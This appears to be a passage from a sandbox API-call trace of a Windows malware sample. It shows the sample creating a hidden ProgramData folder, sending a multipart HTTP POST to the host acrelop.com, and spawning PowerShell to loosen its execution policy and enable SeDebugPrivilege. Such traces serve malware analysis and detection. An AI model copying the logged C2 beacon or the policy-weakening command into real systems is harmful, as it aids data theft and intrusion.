(lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.099] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] lstrlenA (lpString="FQTNSAIAHZXWX6SPT0RBIKJ39KUHBFNQ3OZ44T0FWX9QAT6JZS456H85G0OIQA8BLH2IHYUA9M") returned 74 [0048.100] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x317f30 [0048.100] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.100] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.100] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.100] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.100] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.100] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.100] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.101] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.101] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.101] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.101] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.101] lstrlenA (lpString="OVK23PNKSTLS") returned 12 [0048.101] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x317f48 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.101] lstrlenA (lpString="UVQ4XEFSZWY8E") returned 13 [0048.226] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18e830 | out: lpSystemTimeAsFileTime=0x18e830*(dwLowDateTime=0x1ae92a50, dwHighDateTime=0x1d5956a)) [0048.228] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x2) returned 0x1fd12b8 [0048.228] GetTickCount () returned 0x114586d [0048.228] GetLastError () returned 0x0 [0048.231] CreateDirectoryA (lpPathName="C:\\ProgramData\\42SCM9L59IMZ8FW4YDW376HVQ" (normalized: "c:\\programdata\\42scm9l59imz8fw4ydw376hvq"), lpSecurityAttributes=0x0) returned 1 [0048.256] SetCurrentDirectoryA (lpPathName="C:\\ProgramData\\42SCM9L59IMZ8FW4YDW376HVQ" (normalized: "c:\\programdata\\42scm9l59imz8fw4ydw376hvq")) returned 1 [0048.257] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x30) returned 0x1fd12f0 [0048.257] CreateDirectoryA (lpPathName="C:\\ProgramData\\42SCM9L59IMZ8FW4YDW376HVQ\\files" (normalized: "c:\\programdata\\42scm9l59imz8fw4ydw376hvq\\files"), lpSecurityAttributes=0x0) returned 1 [0048.305] HeapFree (in: hHeap=0x1fd0000, dwFlags=0x0, lpMem=0x1fd12f0 | out: hHeap=0x1fd0000) returned 1 [0048.307] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x7a120) returned 0x1da0048 [0048.313] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x318200 [0048.316] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0048.389] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x18e6ec, dwBufferLength=0x4) returned 1 [0048.389] InternetConnectA (hInternet=0xcc0004, lpszServerName="acrelop.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0048.389] InternetSetOptionA (hInternet=0xcc0008, dwOption=0x41, lpBuffer=0x1, dwBufferLength=0x0) returned 0 [0048.389] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/517", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0048.390] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x80) returned 0x1fd12f0 [0048.390] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1", dwHeadersLength=0x7d, dwModifiers=0x20000000) returned 1 [0048.390] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Language: ru-RU,ru;q=0.9,en;q=0.8", dwHeadersLength=0x28, dwModifiers=0x20000000) returned 1 [0048.390] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1", dwHeadersLength=0x32, dwModifiers=0x20000000) returned 1 [0048.390] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0", dwHeadersLength=0x37, dwModifiers=0x20000000) returned 1 [0048.390] HeapFree (in: hHeap=0x1fd0000, dwFlags=0x0, lpMem=0x1fd12f0 | out: hHeap=0x1fd0000) returned 1 [0048.390] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x30) returned 0x1fd12f0 [0048.390] RtlAllocateHeap (HeapHandle=0x1fd0000, Flags=0x0, Size=0x47) returned 0x1fd1328 [0048.390] HeapFree (in: hHeap=0x1fd0000, dwFlags=0x0, lpMem=0x1fd12f0 | out: hHeap=0x1fd0000) returned 1 [0048.390] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A", dwHeadersLength=0x3f, dwModifiers=0x20000000) returned 1 [0048.390] HttpAddRequestHeadersA (hRequest=0xcc000c, lpszHeaders="Content-Length: 25", dwHeadersLength=0x12, dwModifiers=0x20000000) returned 1 [0048.390] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x1da0048*, dwOptionalLength=0x19) Thread: id = 63 os_tid = 0xa50 Thread: id = 64 os_tid = 0xa54 Thread: id = 65 os_tid = 0xa58 Thread: id = 66 os_tid = 0xa5c Thread: id = 67 os_tid = 0xa60 Thread: id = 68 os_tid = 0xa64 Process: id = "11" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0x4c0f4000" os_pid = "0xa2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xa14" cmd_line = "powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 59 os_tid = 0xa30 [0049.136] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0049.257] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0049.257] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0049.257] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0049.257] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0049.920] GetVersionExW (in: lpVersionInformation=0x3b8440*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3b8440*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.920] GetLastError () returned 0x2 [0049.921] GetVersionExW (in: lpVersionInformation=0x3b8440*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3b8440*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.921] GetLastError () returned 0x2 [0049.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce96c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.927] GetLastError () returned 0x2 [0049.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce988, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0049.933] GetLastError () returned 0x2 [0049.933] GetVersionExW (in: lpVersionInformation=0x3b8440*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3b8440*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0049.933] GetLastError () returned 0x2 [0049.934] SetErrorMode (uMode=0x1) returned 0x1 [0049.935] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x2cee08 | out: lpFileInformation=0x2cee08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0049.935] GetLastError () returned 0x2 [0049.935] SetErrorMode (uMode=0x1) returned 0x1 [0049.938] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x2cee8c | out: lpdwHandle=0x2cee8c) returned 0x94c [0049.940] GetLastError () returned 0x0 [0049.941] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x29a4dcc | out: lpData=0x29a4dcc) returned 1 [0049.944] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2cee58, puLen=0x2cee54 | out: lplpBuffer=0x2cee58*=0x29a4e68, puLen=0x2cee54) returned 1 [0049.946] lstrlenW (lpString="䅁") returned 1 [0049.955] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a4f44, puLen=0x2cedd0) returned 1 [0049.955] lstrlenW (lpString="Microsoft Corporation") returned 21 [0049.956] lstrcpyW (in: lpString1=0x3b8428, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0049.956] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a4f98, puLen=0x2cedd0) returned 1 [0049.956] lstrlenW (lpString="System.Management.Automation") returned 28 [0049.956] lstrcpyW (in: lpString1=0x3b8428, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0049.956] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a4ff4, puLen=0x2cedd0) returned 1 [0049.956] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.956] lstrcpyW (in: lpString1=0x3b8428, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.957] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a5034, puLen=0x2cedd0) returned 1 [0049.957] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.957] lstrcpyW (in: lpString1=0x3b8428, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.957] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a509c, puLen=0x2cedd0) returned 1 [0049.957] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0049.957] lstrcpyW (in: lpString1=0x3b8428, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0049.957] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a5138, puLen=0x2cedd0) returned 1 [0049.957] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0049.957] lstrcpyW (in: lpString1=0x3b8428, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0049.957] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a519c, puLen=0x2cedd0) returned 1 [0049.957] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0049.957] lstrcpyW (in: lpString1=0x3b8428, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0049.957] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a5218, puLen=0x2cedd0) returned 1 [0049.957] lstrlenW (lpString="6.1.7601.17514") returned 14 [0049.957] lstrcpyW (in: lpString1=0x3b8428, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0049.957] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x29a4ec0, puLen=0x2cedd0) returned 1 [0049.957] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0049.957] lstrcpyW (in: lpString1=0x3b8428, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0049.958] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x0, puLen=0x2cedd0) returned 0 [0049.958] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x0, puLen=0x2cedd0) returned 0 [0049.958] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x2cedd4, puLen=0x2cedd0 | out: lplpBuffer=0x2cedd4*=0x0, puLen=0x2cedd0) returned 0 [0049.958] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2cedc8, puLen=0x2cedc4 | out: lplpBuffer=0x2cedc8*=0x29a4e68, puLen=0x2cedc4) returned 1 [0049.959] VerLanguageNameW (in: wLang=0x0, szLang=0x3b8428, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0049.961] VerQueryValueW (in: pBlock=0x29a4dcc, lpSubBlock="\\", lplpBuffer=0x2ceddc, puLen=0x2cedd8 | out: lplpBuffer=0x2ceddc*=0x29a4df4, puLen=0x2cedd8) returned 1 [0049.968] GetCurrentProcessId () returned 0xa2c [0049.990] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x2ce614 | out: lpLuid=0x2ce614*(LowPart=0x14, HighPart=0)) returned 1 [0049.991] GetLastError () returned 0x0 [0049.992] GetCurrentProcess () returned 0xffffffff [0049.992] GetLastError () returned 0x0 [0049.994] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x2ce610 | out: TokenHandle=0x2ce610*=0x304) returned 1 [0049.994] GetLastError () returned 0x0 [0049.997] AdjustTokenPrivileges (in: TokenHandle=0x304, DisableAllPrivileges=0, NewState=0x29a790c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0049.997] GetLastError () returned 0x0 [0049.998] CloseHandle (hObject=0x304) returned 1 [0049.998] GetLastError () returned 0x0 [0050.003] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x304 [0050.003] GetLastError () returned 0x0 [0050.012] EnumProcessModules (in: hProcess=0x304, lphModule=0x29a7950, cb=0x100, lpcbNeeded=0x2cee04 | out: lphModule=0x29a7950, lpcbNeeded=0x2cee04) returned 1 [0050.013] GetLastError () returned 0x0 [0050.016] GetModuleInformation (in: hProcess=0x304, hModule=0x21d10000, lpmodinfo=0x29a7a90, cb=0xc | out: lpmodinfo=0x29a7a90*(lpBaseOfDll=0x21d10000, SizeOfImage=0x72000, EntryPoint=0x21d17363)) returned 1 [0050.016] GetLastError () returned 0x0 [0050.018] GetModuleBaseNameW (in: hProcess=0x304, hModule=0x21d10000, lpBaseName=0x3b29f8, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0050.018] GetLastError () returned 0x0 [0050.019] 